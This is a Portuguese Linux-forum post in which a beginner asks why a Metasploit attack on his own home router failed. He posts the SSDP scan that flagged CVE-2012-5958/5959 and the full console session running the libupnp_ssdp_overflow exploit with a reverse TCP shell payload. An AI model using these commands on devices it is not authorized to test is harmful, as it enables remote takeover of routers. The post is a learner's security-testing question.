Denuncie   Favoritos   Indicar  

Dúvida upnp

1. Dúvida upnp

Antonio Carlos Da Silva Junior
Trash_Override
(usa Slackware)

Enviado em 16/02/2013 - 22:12h

Boa tarde pessoal,

Eu sou newbie em metasploit.
Esta tarde estava testando o roteador wireless aqui de casa utilizado o UPnP SSDP para procurar falhas

abaixo segue o SCAN:

UPnP SSDP M-SEARCH Information Discovery takes this alerts:

msf auxiliary(ssdp_msearch) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
msf auxiliary(ssdp_msearch) > run

[*] Sending UPnP SSDP probes to 192.168.1.1->192.168.1.1 (1 hosts)
[+] 192.168.1.1:1900 SSDP Linux/2.6.21, UPnP/1.0, Portable SDK for UPnP devices/1.3.1 | http://192.168.1.1:49153/gatedesc.xml | uuid:75802409-bccb-40e7-8e6c-fa095ecce13e::upnp:rootdevice | vulns:1 (CVE-2012-5958, CVE-2012-5959)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssdp_msearch) >


Como existe uma falha tentei posteriormente utilizar um exploit abaixo segue o link

http://www.metasploit.com/modules/exploit/multi/upnp/libupnp_ssdp_overflow

Segue a saída. Gostaria de saber o porque não funcionou... alguém tem alguma idéia?

msf > use exploit/multi/upnp/libupnp_ssdp_overflow
msf exploit(libupnp_ssdp_overflow) > set PAYLOAD generic/shell_reverse_tcp
PAYLOAD => generic/shell_reverse_tcp
msf exploit(libupnp_ssdp_overflow) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf exploit(libupnp_ssdp_overflow) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(libupnp_ssdp_overflow) > exploit

[*] Started reverse handler on 192.168.1.3:4444
[*] No target matches this fingerprint
[*]
[*] HTTP/1.1 200 OK
[*] CACHE-CONTROL: max-age=1800
[*] DATE: Sat, 16 Feb 2013 19:46:06 GMT
[*] EXT:
[*] LOCATION: http://192.168.1.1:49153/gatedesc.xml
[*] SERVER: Linux/2.6.21, UPnP/1.0, Portable SDK for UPnP devices/1.3.1
[*] X-User-Agent: redsonic
[*] ST: upnp:rootdevice
[*] USN: uuid:75802409-bccb-40e7-8e6c-fa095ecce13e::upnp:rootdevice
[*]
[*]
[-] Exploit failed [no-target]: No compatible target detected
msf exploit(libupnp_ssdp_overflow) >


Agradeço desde já
abs


0 0
  • Quote

    •   






    Patrocínio

    Site hospedado pelo provedor RedeHost.
    Linux banner

    Destaques

    Artigos

    O comando tput

    Criando um servidor SFTP

    DOOM clássico (quase) vanilla e um pouco melhorado

    Flatpak: usar ou não usar?

    Mamãe, quero descompactar e também compactar arquivos no terminal!

    Dicas

    Atualizar Mint para versão 22 BETA

    Criando super poderes para o mkdir

    Mudando Tema do Grub do Linux Mint

    Warped Tentacles para Doom Clássico

    Conheça a extensão Just Perfection para mudar várias opções do Gnome

    Tópicos

    DST-NAT PORTA 443 (0)

    Sobre um jogo, que preciso (3)

    Wifi da casa dos meus pais não funciona direito no meu notebook (4)

    gravar radio (1)

    Fedora so entra na tela de (3)

    Top 10 do mês

    Scripts

    [Outros] Teste de hardware e outros

    [Shell Script] Script para habilitar um pendrive a dar boot no VirtualBox

    [Shell Script] Script para verificar o Status da bateria

    [Python] Peer-to-peer nós para processamento em multipontos

    [Shell Script] Instalador de Lutris com winehq-staging para rodar Origin em Debian Bullseye (Kernel 5.10.0-23) - 64

    A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.

    Site hospedado por: